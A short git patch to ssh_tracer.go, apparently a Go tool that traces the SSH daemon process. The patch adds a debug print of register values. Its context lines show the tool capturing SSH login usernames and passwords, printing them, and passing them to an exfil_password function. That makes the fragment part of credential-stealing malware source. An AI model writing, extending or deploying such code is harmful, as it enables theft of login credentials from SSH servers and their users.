From 28426e40b13ed8153b8b771a493a202b82256e93 Mon Sep 17 00:00:00 2001 From: Matt Keeley Date: Sun, 25 Feb 2024 16:06:35 -0700 Subject: [PATCH] debug: moar debugggg --- ssh_tracer.go | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ssh_tracer.go b/ssh_tracer.go index 04259fc..59ce0c5 100644 --- a/ssh_tracer.go +++ b/ssh_tracer.go @@ -59,6 +59,8 @@ func traceSSHDProcess(pid int) { fmt.Printf("Username: %q, Password %q\n", username, password) go exfil_password(username, removeFirstFourBytes(password)) } + } else { + fmt.Printf("rdi: %d, rax: %d\n", regs.Rdi, regs.Orig_rax) } } }